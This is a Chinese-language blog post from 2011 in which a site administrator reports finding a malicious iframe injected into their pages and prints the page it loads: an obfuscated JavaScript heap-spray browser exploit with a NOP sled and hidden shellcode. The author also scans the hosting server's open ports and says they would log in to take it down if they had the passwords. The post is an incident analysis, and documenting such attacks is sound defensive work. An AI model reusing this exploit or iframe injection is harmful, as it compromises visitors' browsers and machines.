Chinaunix首页 | 论坛 | 博客
  • 博客访问: 838783
  • 博文数量: 117
  • 博客积分: 2595
  • 博客等级: 少校
  • 技术积分: 1204
  • 用 户 组: 普通用户
  • 注册时间: 2009-09-18 18:16
文章分类

全部博文(117)

文章存档

2013年(1)

2012年(2)

2011年(18)

2010年(95)

2009年(1)

分类: 系统运维

2011-01-08 23:26:14


今天网站突然出现360已经拦截2个木马请求,查看代码 多了以下的恶意代码:


<iframe src= http://bing1227.3322.org:8080/19.htm width=500 height=500></iframe>


这个网页内容是:


<div id=sun style='display:none'>



悙悙悙悙悙悙悙悙
 <BUTTON ID='anhey' ONCLICK='anheywangma();' STYLE='DISPLAY:NONE'></BUTTON>
<script language="JavaScript">                                    
    function code()                                               
{                                                              
    var div=document.getElementById('sun');                       
    var decode=div.innerHTML;                                     
    var x=decode.indexOf('MM');                                   
    var y=decode.indexOf('NN');                                   
    var xxcode=decode.substring(x+2,y);                           
    return xxcode;                                                
}                                                                
function sc()                                                  
{                                                              
    var div=document.getElementById('sun');                       
    var decode=div.innerHTML;                                     
    var x=decode.indexOf('XX');                                   
    var y=decode.indexOf('YY')                                    
    var cc=decode.substring(x+2,y);                               
    cc=unescape(cc);                                              
    return cc;                                                    
}                                                              
                                                               
function anheywangma()                                                 
{                                                              
    var d=document.createElement('DIV');                          
    d.addBehavior('#default#userData');                           
    document.appendChild(d);                                      
    try{for (i=0;i<10;i++)                                        
        {d.setAttribute('s',window);}}                              
    catch(e){}                                                    
    window.status+='';                                            
    }                                                             
var memory;                                                    
var temptest = decodeURI(',sun,0c0c,sun,0c0c');                
var nop=unescape(temptest.replace(/,sun,/g,'%u'));             
var SC=sc();                                                   
var xcode=code()-SC.length*2;                                  
while(nop.length <= xcode) nop+=nop;                              
nop=nop.substring(0,xcode - SC.length);                        
memory=new Array();                                            
for(i=0;i<0x100;i++){memory[i]=nop + SC;}                      
                                                               
CollectGarbage();                                              
document.getElementById('anhey').onclick();                      
</script>                                                      
   


这个bing1227.3322.org的IP是:属于上海市 集思网络 IDC。
或许是被肉鸡了。。然后有人再恶意利用了。。
3322.org是动态域名,也可以作为固定ip服务。。就是免费2J域名了。。

这个服务器
开放了21 8080 3389端口
21 是小型ftp
Quick Easy FTP Server.rar 3.9.3 吧。。
8080是HFS 汉化版,里面有五个文件。。其中就包括这个木马文件


网上搜了搜
http://www.discuz.net/forum.php?mod=viewthread&tid=2020410&extra=page%3D1&page=1
这个有涉及到这个恶意代码。。
看来这个恶意的hfs 发布的网页 已经有六天了。。
上面说是ARP,不过没有解释。。。

3389端口开了,但是无法进入,不知道密码。。FTP也是。。要不一定要关闭这个站!!

阅读(2483) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~